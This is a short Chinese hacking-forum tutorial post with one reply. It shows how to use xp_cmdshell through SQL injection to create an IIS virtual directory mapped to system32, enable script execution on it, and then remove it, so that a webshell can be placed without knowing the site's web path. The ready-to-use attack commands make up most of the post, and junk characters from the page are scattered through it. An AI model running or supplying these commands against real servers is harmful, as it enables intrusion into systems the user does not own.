返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:) N1 }0 ?; @) G0 i) N$ t  o& z$ v

+ P' Q; E% S# t1 w7 t1 X) s# Kexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
- s( s, P9 k9 r6 e, ?( H建立虚拟目录win,指向c:\windows\system32
6 V. w: v% W1 a% ^5 j; @5 f: u3 Qexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'" y5 s- D0 ]6 E2 o2 M
让win句有解析asp脚本权限
6 Q2 j- {5 E4 _) H
1 Z  {0 p: f4 w% nexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"4 \" a' t, C$ v$ i& Z
删除虚拟目录。# o4 `/ v" l; g* Z, h* d
找不到web绝对路径的一种解决办法,
+ X6 d* X3 [. D
. U/ {$ H1 q7 p) U1 }403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表